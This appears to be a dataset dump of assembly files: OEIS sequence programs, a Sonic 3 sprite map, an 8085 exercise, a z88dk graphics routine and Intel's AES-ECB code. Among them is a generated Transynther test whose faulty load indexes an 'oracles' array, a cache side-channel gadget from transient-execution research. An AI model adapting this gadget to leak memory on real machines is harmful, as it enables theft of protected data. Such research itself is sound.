devngho/the-stack-mini-nonshuffled · Datasets at Hugging Face

e5232661f9a5c0551cbd41b80d0aacc37810b2e0

840

asm

Assembly

oeis/297/A297809.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/297/A297809.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/297/A297809.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A297809: Number of n X 2 0..1 arrays with every element equal to 2 or 3 king-move adjacent elements, with upper left element zero. ; Submitted by Christian Krause ; 0,1,2,1,8,5,22,29,60,121,194,425,704,1421,2574,4821,9156,16769,31962,58977,111112,207317,387366,726221,1354508,2538761,4741234,8872857,16592208,31023517,58039870,108509253,202982228,379560465,709885450,1327627345,2482812824,4643532005,8683922262,16240966973,30373205148,56803681433,106233704866,198675520649,371562067168,694886608813,1299569833070,2430432919477,4545358582500,8500665206945,15897801920314,29731846946881,55604019009832,103989814267381,194480147082630,363713786928045,680212031762988 lpb $0 sub $0,1 sub $2,1 sub $3,$4 mul $3,2 sub $3,$2 add $1,$3 add $4,1 mov $5,$4 mov $4,$2 mov $2,$3 add $4,$1 add $5,$4 mov $3,$5 lpe mov $0,$2

40

500

0.769048

62cf0c9e542843906233899a6518735182d8384d

591

asm

Assembly

Working Disassembly/Levels/AIZ/Misc Object Data/Map - Intro Emeralds.asm

TeamASM-Blur/Sonic-3-Blue-Balls-Edition

7e8a2c5df02271615ff4cae529521e6b1560d6b1

[ "Apache-2.0" ]

5

2021-07-09T08:17:56.000Z

2022-02-27T19:57:47.000Z

Working Disassembly/Levels/AIZ/Misc Object Data/Map - Intro Emeralds.asm

TeamASM-Blur/Sonic-3-Blue-Balls-Edition

7e8a2c5df02271615ff4cae529521e6b1560d6b1

[ "Apache-2.0" ]

null

Working Disassembly/Levels/AIZ/Misc Object Data/Map - Intro Emeralds.asm

TeamASM-Blur/Sonic-3-Blue-Balls-Edition

7e8a2c5df02271615ff4cae529521e6b1560d6b1

[ "Apache-2.0" ]

null

Map_364562: dc.w Frame_364570-Map_364562 dc.w Frame_364578-Map_364562 dc.w Frame_364580-Map_364562 dc.w Frame_364588-Map_364562 dc.w Frame_364590-Map_364562 dc.w Frame_364598-Map_364562 dc.w Frame_3645A0-Map_364562 Frame_364570: dc.w 1 dc.b $FC, 0, 0, 0,$FF,$FC Frame_364578: dc.w 1 dc.b $FC, 0, 0, 1,$FF,$FC Frame_364580: dc.w 1 dc.b $FC, 0, 0, 2,$FF,$FC Frame_364588: dc.w 1 dc.b $FC, 0, 0, 3,$FF,$FC Frame_364590: dc.w 1 dc.b $FC, 0, 0, 4,$FF,$FC Frame_364598: dc.w 1 dc.b $FC, 0, 0, 5,$FF,$FC Frame_3645A0: dc.w 1 dc.b $FC, 0, 0, 6,$FF,$FC

26.863636

40

0.64467

bf6436ddc9e21582a7e31d09e268de40f3ca76e8

702

asm

Assembly

programs/oeis/323/A323294.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/323/A323294.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

programs/oeis/323/A323294.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

; A323294: Number of 3-uniform hypergraphs spanning n labeled vertices where every two edges have two vertices in common. ; 1,0,0,1,11,10,15,21,28,36,45,55,66,78,91,105,120,136,153,171,190,210,231,253,276,300,325,351,378,406,435,465,496,528,561,595,630,666,703,741,780,820,861,903,946,990,1035,1081,1128,1176,1225,1275,1326,1378,1431 mov $3,$0 mov $4,2 lpb $4 mov $0,$3 sub $4,1 add $0,$4 sub $0,1 mov $5,$0 sub $0,1 trn $0,2 trn $5,2 add $5,1 lpb $0 mov $0,0 add $5,2 bin $5,3 mov $7,0 mov $8,$5 mov $5,1 add $8,2 add $7,$8 add $5,$7 lpe mov $2,$4 mov $6,$5 lpb $2 mov $1,$6 sub $2,1 lpe lpe lpb $3 sub $1,$6 mov $3,0 lpe

18.473684

211

0.586895

29a267d6bbce6d4cd371eb9432b41aeabfe187f3

963

asm

Assembly

8085 Microprocessor/Assignment 2/sol3b.asm

neeladripal/bcse-lab

915d2f535ae95a062438fc85980419646a3951ad

[ "MIT" ]

null

8085 Microprocessor/Assignment 2/sol3b.asm

neeladripal/bcse-lab

915d2f535ae95a062438fc85980419646a3951ad

[ "MIT" ]

null

8085 Microprocessor/Assignment 2/sol3b.asm

neeladripal/bcse-lab

915d2f535ae95a062438fc85980419646a3951ad

[ "MIT" ]

1

2021-08-06T14:39:53.000Z

LXI H,2050H ; set up HL to point to first number in array LDA 204FH ; store value of N in 204FH MOV C,A ; place N in register C to use as counter MOV B,M ; copy the first number in register B INX H ; increment H to point to the address of second number DCR C ; one operation complete, decrement counter NXTBYTE: MOV A,M ; place number pointed to by HL pair in accumulator CMP B ; compare contents of register B and accumulator JNC NEXT ; check if carry flag is 1 MOV B,A ; if carry flag is 0, contents of register B is smaller, copy contents of B into accumulator NEXT: INX H ; increment HL to point to next address DCR C ; one operation complete, decrement counter JNZ NXTBYTE ; jump to check the next number MOV A,B ; copy the minimum number into accumulator STA 2070H ; store the contents of accumulator in 2070H HLT ; stop

53.5

109

0.656282

5138e0de497d930b0f8fe97014cd7068934d6cfe

3,348

asm

Assembly

libsrc/target/z1013/graphics/stencil_render.asm

dikdom/z88dk

40c55771062b0ea9bb2f0d5b73e2f754fc12b6b0

[ "ClArtistic" ]

1

2022-03-08T11:55:58.000Z

libsrc/target/z1013/graphics/stencil_render.asm

dikdom/z88dk

40c55771062b0ea9bb2f0d5b73e2f754fc12b6b0

[ "ClArtistic" ]

2

2022-03-20T22:17:35.000Z

2022-03-24T16:10:00.000Z

libsrc/target/z1013/graphics/stencil_render.asm

jorgegv/z88dk

127130cf11f9ff268ba53e308138b12d2b9be90a

[ "ClArtistic" ]

null

; ; z88dk GFX library ; ; Render the "stencil". ; The dithered horizontal lines base their pattern on the Y coordinate ; and on an 'intensity' parameter (0..11). ; Basic concept by Rafael de Oliveira Jannone ; ; Machine code version by Stefano Bodrato, 22/4/2009 ; ; stencil_render(unsigned char *stencil, unsigned char intensity) ; INCLUDE "graphics/grafix.inc" MODULE __z1013_stencil_render SECTION smc_clib PUBLIC stencil_render PUBLIC _stencil_render EXTERN dither_pattern EXTERN swapgfxbk EXTERN pixeladdress EXTERN leftbitmask, rightbitmask EXTERN KRT_BANK_SELECTOR EXTERN KRT_PORT EXTERN __z1013_mode EXTERN __generic_stencil_render ; ; $Id: stencil_render.asm,v 1.8 2016-04-22 20:29:52 dom Exp $ ; end: pop ix ld a,KRT_BANK_SELECTOR out (KRT_PORT),a ret .stencil_render ._stencil_render ld a,(__z1013_mode) and a jp z,__generic_stencil_render push ix ld ix,4 add ix,sp ld c,0 push bc .yloop pop bc dec c jp z,end push bc ld d,0 ld e,c ld l,(ix+2) ; stencil ld h,(ix+3) add hl,de ld a,(hl) ;X1 ld e,0 inc h cp (hl) ; if x1>x2, return jr nc,yloop ; C still holds Y push af ; X1 ld a,(hl) ld b,a ; X2 ld a,(ix+0) ; intensity call dither_pattern ld (pattern1+1),a ld (pattern2+1),a pop af ld h,a ; X1 ld l,c ; Y push bc call pixeladdress ; bitpos0 = pixeladdress(x,y) call leftbitmask ; LeftBitMask(bitpos0) pop bc push de ld h,d ld l,e call mask_pattern push af ;ld (hl),a ld h,b ; X2 ld l,c ; Y call pixeladdress ; bitpos1 = pixeladdress(x+width-1,y) call rightbitmask ; RightBitMask(bitpos1) ld (bitmaskr+1),a ; bitmask1 = LeftBitMask(bitpos0) pop af ; pattern to be drawn (left-masked) pop hl ; adr0 push hl ex de,hl and a sbc hl,de jr z,onebyte ; area is within the same address... ld b,l ; number of full bytes in a row pop hl ld (hl),a ; (offset) = (offset) AND bitmask0 inc hl ; offset += 1 (8 bits) .pattern2 ld a,0 dec b jr z,bitmaskr .fill_row_loop ; do ld (hl),a ; (offset) = pattern inc hl ; offset += 1 (8 bits) djnz fill_row_loop ; while ( r-- != 0 ) .bitmaskr ld a,0 call mask_pattern ld (hl),a jr yloop .onebyte pop hl ld (pattern1+1),a jr bitmaskr ; Prepare an edge byte, basing on the byte mask in A ; and on the pattern being set in (pattern1+1) .mask_pattern ld d,a ; keep a copy of mask and (hl) ; mask data on screen ld e,a ; save masked data ld a,d ; retrieve mask cpl ; invert it .pattern1 and 0 ; prepare fill pattern portion or e ; mix with masked data ret

22.026316

73

0.521505

84f685a22e1982c7bfd0258f2c58ea7656e937d9

389

asm

Assembly

programs/oeis/280/A280512.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/280/A280512.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

programs/oeis/280/A280512.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

; A280512: Index sequence of the Thue-Morse sequence (A010060, using offset 1) as a reverse block-fractal sequence. ; 1,3,2,1,12,11,10,9,8,7,6,5,4,3,2,1,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,192,191,190,189,188 mov $1,1 mov $2,$0 add $2,1 lpb $0 div $0,4 mul $1,4 lpe sub $1,$2 add $1,1

29.923077

191

0.652956

a218727534979945369f3f10428517e1a414f517

1,541

asm

Assembly

Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48.log_157_2107.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

9

2020-08-13T19:41:58.000Z

2022-03-30T12:22:51.000Z

Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48.log_157_2107.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

1

2021-04-29T06:29:35.000Z

2021-05-13T21:02:30.000Z

Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48.log_157_2107.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

3

2020-07-14T17:07:07.000Z

2022-03-21T01:12:22.000Z

.global s_prepare_buffers s_prepare_buffers: ret .global s_faulty_load s_faulty_load: push %r12 push %r13 push %r15 push %r8 push %r9 push %rdx push %rsi // Store lea addresses_RW+0x16f04, %r13 nop nop sub $9017, %rdx mov $0x5152535455565758, %r8 movq %r8, %xmm0 vmovups %ymm0, (%r13) nop nop nop nop nop add $40134, %r15 // Faulty Load mov $0x6518100000001c4, %r12 nop nop nop nop nop sub $21740, %rsi vmovups (%r12), %ymm3 vextracti128 $0, %ymm3, %xmm3 vpextrq $0, %xmm3, %r13 lea oracles, %r15 and $0xff, %r13 shlq $12, %r13 mov (%r15,%r13,1), %r13 pop %rsi pop %rdx pop %r9 pop %r8 pop %r15 pop %r13 pop %r12 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_NC', 'AVXalign': False, 'congruent': 0, 'size': 32, 'same': False, 'NT': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_RW', 'AVXalign': False, 'congruent': 6, 'size': 32, 'same': False, 'NT': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_NC', 'AVXalign': False, 'congruent': 0, 'size': 32, 'same': True, 'NT': False}} <gen_prepare_buffer> {'00': 157} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */

23.707692

470

0.656716

d50b5a0aa55b9d820be960d631d0c46963475848

13,111

asm

Assembly

lib/sse/aes128_ecb_by4_sse.asm

edtubbs/intel-ipsec-mb

27bb66dcdf5aec2aec8cc0a6bee9c1da96898d7f

[ "BSD-3-Clause" ]

null

lib/sse/aes128_ecb_by4_sse.asm

edtubbs/intel-ipsec-mb

27bb66dcdf5aec2aec8cc0a6bee9c1da96898d7f

[ "BSD-3-Clause" ]

null

lib/sse/aes128_ecb_by4_sse.asm

edtubbs/intel-ipsec-mb

27bb66dcdf5aec2aec8cc0a6bee9c1da96898d7f

[ "BSD-3-Clause" ]

null

;; ;; Copyright (c) 2019-2021, Intel Corporation ;; ;; Redistribution and use in source and binary forms, with or without ;; modification, are permitted provided that the following conditions are met: ;; ;; * Redistributions of source code must retain the above copyright notice, ;; this list of conditions and the following disclaimer. ;; * Redistributions in binary form must reproduce the above copyright ;; notice, this list of conditions and the following disclaimer in the ;; documentation and/or other materials provided with the distribution. ;; * Neither the name of Intel Corporation nor the names of its contributors ;; may be used to endorse or promote products derived from this software ;; without specific prior written permission. ;; ;; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" ;; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE ;; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE ;; DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE ;; FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL ;; DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR ;; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER ;; CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, ;; OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE ;; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ;; ; routine to do AES ECB encrypt/decrypt on 16n bytes doing AES by 4 ; XMM registers are clobbered. Saving/restoring must be done at a higher level ; void aes_ecb_x_y_sse(void *in, ; UINT128 keys[], ; void *out, ; UINT64 len_bytes); ; ; x = direction (enc/dec) ; y = key size (128/192/256) ; arg 1: IN: pointer to input (cipher text) ; arg 2: KEYS: pointer to keys ; arg 3: OUT: pointer to output (plain text) ; arg 4: LEN: length in bytes (multiple of 16) ; %include "include/os.asm" %include "include/clear_regs.asm" %ifndef AES_ECB_ENC_256 %ifndef AES_ECB_ENC_192 %ifndef AES_ECB_ENC_128 %define AES_ECB_ENC_128 aes_ecb_enc_128_sse %define AES_ECB_DEC_128 aes_ecb_dec_128_sse %endif %endif %endif %ifdef LINUX %define IN rdi %define KEYS rsi %define OUT rdx %define LEN rcx %else %define IN rcx %define KEYS rdx %define OUT r8 %define LEN r9 %endif %define IDX rax %define TMP IDX %define XDATA0 xmm0 %define XDATA1 xmm1 %define XDATA2 xmm2 %define XDATA3 xmm3 %define XKEY0 xmm4 %define XKEY2 xmm5 %define XKEY4 xmm6 %define XKEY6 xmm7 %define XKEY10 xmm8 %define XKEY_A xmm14 %define XKEY_B xmm15 section .text %macro AES_ECB 2 %define %%NROUNDS %1 ; [in] Number of AES rounds, numerical value %define %%DIR %2 ; [in] Direction (encrypt/decrypt) %ifidn %%DIR, ENC %define AES aesenc %define AES_LAST aesenclast %else ; DIR = DEC %define AES aesdec %define AES_LAST aesdeclast %endif mov TMP, LEN and TMP, 3*16 jz %%initial_4 cmp TMP, 2*16 jb %%initial_1 ja %%initial_3 %%initial_2: ; load plain/cipher text movdqu XDATA0, [IN + 0*16] movdqu XDATA1, [IN + 1*16] movdqa XKEY0, [KEYS + 0*16] pxor XDATA0, XKEY0 ; 0. ARK pxor XDATA1, XKEY0 movdqa XKEY2, [KEYS + 2*16] AES XDATA0, [KEYS + 1*16] ; 1. ENC AES XDATA1, [KEYS + 1*16] mov IDX, 2*16 AES XDATA0, XKEY2 ; 2. ENC AES XDATA1, XKEY2 movdqa XKEY4, [KEYS + 4*16] AES XDATA0, [KEYS + 3*16] ; 3. ENC AES XDATA1, [KEYS + 3*16] AES XDATA0, XKEY4 ; 4. ENC AES XDATA1, XKEY4 movdqa XKEY6, [KEYS + 6*16] AES XDATA0, [KEYS + 5*16] ; 5. ENC AES XDATA1, [KEYS + 5*16] AES XDATA0, XKEY6 ; 6. ENC AES XDATA1, XKEY6 movdqa XKEY_B, [KEYS + 8*16] AES XDATA0, [KEYS + 7*16] ; 7. ENC AES XDATA1, [KEYS + 7*16] AES XDATA0, XKEY_B ; 8. ENC AES XDATA1, XKEY_B movdqa XKEY10, [KEYS + 10*16] AES XDATA0, [KEYS + 9*16] ; 9. ENC AES XDATA1, [KEYS + 9*16] %if %%NROUNDS >= 12 AES XDATA0, XKEY10 ; 10. ENC AES XDATA1, XKEY10 AES XDATA0, [KEYS + 11*16] ; 11. ENC AES XDATA1, [KEYS + 11*16] %endif %if %%NROUNDS == 14 AES XDATA0, [KEYS + 12*16] ; 12. ENC AES XDATA1, [KEYS + 12*16] AES XDATA0, [KEYS + 13*16] ; 13. ENC AES XDATA1, [KEYS + 13*16] %endif %if %%NROUNDS == 10 AES_LAST XDATA0, XKEY10 ; 10. ENC AES_LAST XDATA1, XKEY10 %elif %%NROUNDS == 12 AES_LAST XDATA0, [KEYS + 12*16] ; 12. ENC AES_LAST XDATA1, [KEYS + 12*16] %else AES_LAST XDATA0, [KEYS + 14*16] ; 14. ENC AES_LAST XDATA1, [KEYS + 14*16] %endif movdqu [OUT + 0*16], XDATA0 movdqu [OUT + 1*16], XDATA1 cmp LEN, 2*16 je %%done jmp %%main_loop align 16 %%initial_1: ; load plain/cipher text movdqu XDATA0, [IN + 0*16] movdqa XKEY0, [KEYS + 0*16] pxor XDATA0, XKEY0 ; 0. ARK movdqa XKEY2, [KEYS + 2*16] AES XDATA0, [KEYS + 1*16] ; 1. ENC mov IDX, 1*16 AES XDATA0, XKEY2 ; 2. ENC movdqa XKEY4, [KEYS + 4*16] AES XDATA0, [KEYS + 3*16] ; 3. ENC AES XDATA0, XKEY4 ; 4. ENC movdqa XKEY6, [KEYS + 6*16] AES XDATA0, [KEYS + 5*16] ; 5. ENC AES XDATA0, XKEY6 ; 6. ENC movdqa XKEY_B, [KEYS + 8*16] AES XDATA0, [KEYS + 7*16] ; 7. ENC AES XDATA0, XKEY_B ; 8. ENC movdqa XKEY10, [KEYS + 10*16] AES XDATA0, [KEYS + 9*16] ; 9. ENC %if %%NROUNDS >= 12 AES XDATA0, XKEY10 ; 10. ENC AES XDATA0, [KEYS + 11*16] ; 11. ENC %endif %if %%NROUNDS == 14 AES XDATA0, [KEYS + 12*16] ; 12. ENC AES XDATA0, [KEYS + 13*16] ; 13. ENC %endif %if %%NROUNDS == 10 AES_LAST XDATA0, XKEY10 ; 10. ENC %elif %%NROUNDS == 12 AES_LAST XDATA0, [KEYS + 12*16] ; 12. ENC %else AES_LAST XDATA0, [KEYS + 14*16] ; 14. ENC %endif movdqu [OUT + 0*16], XDATA0 cmp LEN, 1*16 je %%done jmp %%main_loop %%initial_3: ; load plain/cipher text movdqu XDATA0, [IN + 0*16] movdqu XDATA1, [IN + 1*16] movdqu XDATA2, [IN + 2*16] movdqa XKEY0, [KEYS + 0*16] movdqa XKEY_A, [KEYS + 1*16] pxor XDATA0, XKEY0 ; 0. ARK pxor XDATA1, XKEY0 pxor XDATA2, XKEY0 movdqa XKEY2, [KEYS + 2*16] AES XDATA0, XKEY_A ; 1. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A movdqa XKEY_A, [KEYS + 3*16] mov IDX, 3*16 AES XDATA0, XKEY2 ; 2. ENC AES XDATA1, XKEY2 AES XDATA2, XKEY2 movdqa XKEY4, [KEYS + 4*16] AES XDATA0, XKEY_A ; 3. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A movdqa XKEY_A, [KEYS + 5*16] AES XDATA0, XKEY4 ; 4. ENC AES XDATA1, XKEY4 AES XDATA2, XKEY4 movdqa XKEY6, [KEYS + 6*16] AES XDATA0, XKEY_A ; 5. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A movdqa XKEY_A, [KEYS + 7*16] AES XDATA0, XKEY6 ; 6. ENC AES XDATA1, XKEY6 AES XDATA2, XKEY6 movdqa XKEY_B, [KEYS + 8*16] AES XDATA0, XKEY_A ; 7. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A movdqa XKEY_A, [KEYS + 9*16] AES XDATA0, XKEY_B ; 8. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B movdqa XKEY_B, [KEYS + 10*16] AES XDATA0, XKEY_A ; 9. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A %if %%NROUNDS >= 12 movdqa XKEY_A, [KEYS + 11*16] AES XDATA0, XKEY_B ; 10. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B movdqa XKEY_B, [KEYS + 12*16] AES XDATA0, XKEY_A ; 11. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A %endif %if %%NROUNDS == 14 movdqa XKEY_A, [KEYS + 13*16] AES XDATA0, XKEY_B ; 12. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B movdqa XKEY_B, [KEYS + 14*16] AES XDATA0, XKEY_A ; 13. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A %endif AES_LAST XDATA0, XKEY_B ; 10/12/14. ENC (depending on key size) AES_LAST XDATA1, XKEY_B AES_LAST XDATA2, XKEY_B movdqu [OUT + 0*16], XDATA0 movdqu [OUT + 1*16], XDATA1 movdqu [OUT + 2*16], XDATA2 cmp LEN, 3*16 je %%done jmp %%main_loop align 16 %%initial_4: ; load plain/cipher text movdqu XDATA0, [IN + 0*16] movdqu XDATA1, [IN + 1*16] movdqu XDATA2, [IN + 2*16] movdqu XDATA3, [IN + 3*16] movdqa XKEY0, [KEYS + 0*16] movdqa XKEY_A, [KEYS + 1*16] pxor XDATA0, XKEY0 ; 0. ARK pxor XDATA1, XKEY0 pxor XDATA2, XKEY0 pxor XDATA3, XKEY0 movdqa XKEY2, [KEYS + 2*16] AES XDATA0, XKEY_A ; 1. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A movdqa XKEY_A, [KEYS + 3*16] mov IDX, 4*16 AES XDATA0, XKEY2 ; 2. ENC AES XDATA1, XKEY2 AES XDATA2, XKEY2 AES XDATA3, XKEY2 movdqa XKEY4, [KEYS + 4*16] AES XDATA0, XKEY_A ; 3. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A movdqa XKEY_A, [KEYS + 5*16] AES XDATA0, XKEY4 ; 4. ENC AES XDATA1, XKEY4 AES XDATA2, XKEY4 AES XDATA3, XKEY4 movdqa XKEY6, [KEYS + 6*16] AES XDATA0, XKEY_A ; 5. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A movdqa XKEY_A, [KEYS + 7*16] AES XDATA0, XKEY6 ; 6. ENC AES XDATA1, XKEY6 AES XDATA2, XKEY6 AES XDATA3, XKEY6 movdqa XKEY_B, [KEYS + 8*16] AES XDATA0, XKEY_A ; 7. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A movdqa XKEY_A, [KEYS + 9*16] AES XDATA0, XKEY_B ; 8. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B AES XDATA3, XKEY_B movdqa XKEY_B, [KEYS + 10*16] AES XDATA0, XKEY_A ; 9. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A %if %%NROUNDS >= 12 movdqa XKEY_A, [KEYS + 11*16] AES XDATA0, XKEY_B ; 10. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B AES XDATA3, XKEY_B movdqa XKEY_B, [KEYS + 12*16] AES XDATA0, XKEY_A ; 11. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A %endif %if %%NROUNDS == 14 movdqa XKEY_A, [KEYS + 13*16] AES XDATA0, XKEY_B ; 12. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B AES XDATA3, XKEY_B movdqa XKEY_B, [KEYS + 14*16] AES XDATA0, XKEY_A ; 13. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A %endif AES_LAST XDATA0, XKEY_B ; 10/12/14. ENC (depending on key size) AES_LAST XDATA1, XKEY_B AES_LAST XDATA2, XKEY_B AES_LAST XDATA3, XKEY_B movdqu [OUT + 0*16], XDATA0 movdqu [OUT + 1*16], XDATA1 movdqu [OUT + 2*16], XDATA2 movdqu [OUT + 3*16], XDATA3 cmp LEN, 4*16 jz %%done jmp %%main_loop align 16 %%main_loop: ; load plain/cipher text movdqu XDATA0, [IN + IDX + 0*16] movdqu XDATA1, [IN + IDX + 1*16] movdqu XDATA2, [IN + IDX + 2*16] movdqu XDATA3, [IN + IDX + 3*16] movdqa XKEY_A, [KEYS + 1*16] pxor XDATA0, XKEY0 ; 0. ARK pxor XDATA1, XKEY0 pxor XDATA2, XKEY0 pxor XDATA3, XKEY0 add IDX, 4*16 AES XDATA0, XKEY_A ; 1. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A movdqa XKEY_A, [KEYS + 3*16] AES XDATA0, XKEY2 ; 2. ENC AES XDATA1, XKEY2 AES XDATA2, XKEY2 AES XDATA3, XKEY2 AES XDATA0, XKEY_A ; 3. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A movdqa XKEY_A, [KEYS + 5*16] AES XDATA0, XKEY4 ; 4. ENC AES XDATA1, XKEY4 AES XDATA2, XKEY4 AES XDATA3, XKEY4 AES XDATA0, XKEY_A ; 5. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A movdqa XKEY_A, [KEYS + 7*16] AES XDATA0, XKEY6 ; 6. ENC AES XDATA1, XKEY6 AES XDATA2, XKEY6 AES XDATA3, XKEY6 movdqa XKEY_B, [KEYS + 8*16] AES XDATA0, XKEY_A ; 7. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A movdqa XKEY_A, [KEYS + 9*16] AES XDATA0, XKEY_B ; 8. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B AES XDATA3, XKEY_B movdqa XKEY_B, [KEYS + 10*16] AES XDATA0, XKEY_A ; 9. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A %if %%NROUNDS >= 12 movdqa XKEY_A, [KEYS + 11*16] AES XDATA0, XKEY_B ; 10. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B AES XDATA3, XKEY_B movdqa XKEY_B, [KEYS + 12*16] AES XDATA0, XKEY_A ; 11. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A %endif %if %%NROUNDS == 14 movdqa XKEY_A, [KEYS + 13*16] AES XDATA0, XKEY_B ; 12. ENC AES XDATA1, XKEY_B AES XDATA2, XKEY_B AES XDATA3, XKEY_B movdqa XKEY_B, [KEYS + 14*16] AES XDATA0, XKEY_A ; 13. ENC AES XDATA1, XKEY_A AES XDATA2, XKEY_A AES XDATA3, XKEY_A %endif AES_LAST XDATA0, XKEY_B ; 10/12/14. ENC (depending on key size) AES_LAST XDATA1, XKEY_B AES_LAST XDATA2, XKEY_B AES_LAST XDATA3, XKEY_B movdqu [OUT + IDX + 0*16 - 4*16], XDATA0 movdqu [OUT + IDX + 1*16 - 4*16], XDATA1 movdqu [OUT + IDX + 2*16 - 4*16], XDATA2 movdqu [OUT + IDX + 3*16 - 4*16], XDATA3 cmp IDX, LEN jne %%main_loop %%done: %ifdef SAFE_DATA clear_all_xmms_sse_asm %endif ;; SAFE_DATA ret %endmacro ;; ;; AES-ECB 128 functions ;; %ifdef AES_ECB_ENC_128 align 16 MKGLOBAL(AES_ECB_ENC_128,function,internal) AES_ECB_ENC_128: AES_ECB 10, ENC align 16 MKGLOBAL(AES_ECB_DEC_128,function,internal) AES_ECB_DEC_128: AES_ECB 10, DEC %endif ;; ;; AES-ECB 192 functions ;; %ifdef AES_ECB_ENC_192 align 16 MKGLOBAL(AES_ECB_ENC_192,function,internal) AES_ECB_ENC_192: AES_ECB 12, ENC align 16 MKGLOBAL(AES_ECB_DEC_192,function,internal) AES_ECB_DEC_192: AES_ECB 12, DEC %endif ;; ;; AES-ECB 256 functions ;; %ifdef AES_ECB_ENC_256 align 16 MKGLOBAL(AES_ECB_ENC_256,function,internal) AES_ECB_ENC_256: AES_ECB 14, ENC align 16 MKGLOBAL(AES_ECB_DEC_256,function,internal) AES_ECB_DEC_256: AES_ECB 14, DEC %endif %ifdef LINUX section .note.GNU-stack noalloc noexec nowrite progbits %endif

